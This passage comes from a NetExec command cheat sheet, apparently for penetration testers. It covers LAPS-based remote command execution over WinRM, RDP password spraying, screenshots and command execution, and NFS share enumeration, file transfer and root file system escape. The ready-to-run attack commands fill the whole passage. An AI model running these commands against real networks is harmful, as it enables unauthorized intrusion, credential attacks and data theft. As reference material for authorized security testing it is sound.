NetExec winrm 10.1.1.1 -u 'user-can-read-laps' -p 'pass' --laps           #Execute a command on remote host on the domain if LAPS is used
NetExec winrm 10.1.1.1 -u 'user-can-read-laps' -p 'pass' --laps 'name'    #Execute a command on remote host on the domain if LAPS is used and default admin name is not administrator

RDP Modules

No RDP modules at this time

RDP Usage

###Password Spraying
nxc rdp 10.1.1.0/24 -u 'user' -p 'pass'                                    #RDP password spray
nxc rdp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce            #Password spraying (without bruteforce)

###Screenshot
nxc rdp 10.1.1.1 -u 'user' -p 'pass' --screenshot --screentime <seconds>   #Perform an RDP screenshot

###Screenshot Without NLA
nxc rdp 10.1.1.1 --nla-screenshot                                          #Perform a screenshot of the login page of the remote host using RDP if NLA is disabled

###Command Execution
nxc rdp 10.1.1.1 -x whoami                                                 #Command execution over RDP
nxc rdp 10.1.1.1 -x whoami --cmd-delay --clipboard-delay                   #Flags to help if the target is very slow

NFS Modules

No NFS modules at this time

NFS Usage

###Enumerate NFS Servers
nxc nfs 10.1.1.1                                             #Detect remote NFS server, enumerate available versions and check for the root escape

###Enumerate NFS Shares
nxc nfs 10.1.1.1 --shares                                    #Enumerate exported NFS shares. Output shows target UID, Permissions, Storage Usage, Access List

###List Files
nxc nfs 10.1.1.1 --share '/var/nfs/general' --ls '/'         #List files on the target system. Choose the target share with the --share flag

###Enumerate all Files on NFS Shares
nxc nfs 10.1.1.1 --enum-shares                               #Enumerate all files and folders recursively with --enum-shares with a given recursion depth (default is 3 layers). 
nxc nfs 10.1.1.1 --enum-shares 5                             #Enumerate all files and folders recursively with --enum-shares with a given recursion depth of 5

##Download and Upload Files
nxc nfs 10.1.1.1 --share /home/user/Desktop/NFSShare/ --get-file test.txt test.txt           #Download test.txt file on remote target
nxc nfs 10.1.1.1 --share /home/user/Desktop/NFSShare/ --put-file test.txt test.txt           #Upload test.txt file to remote target
 
###Escape to Root File System
nxc nfs 10.1.1.1 --ls '/'                                   #NetExec will automatically try to use the root escape if no share was specified in the command.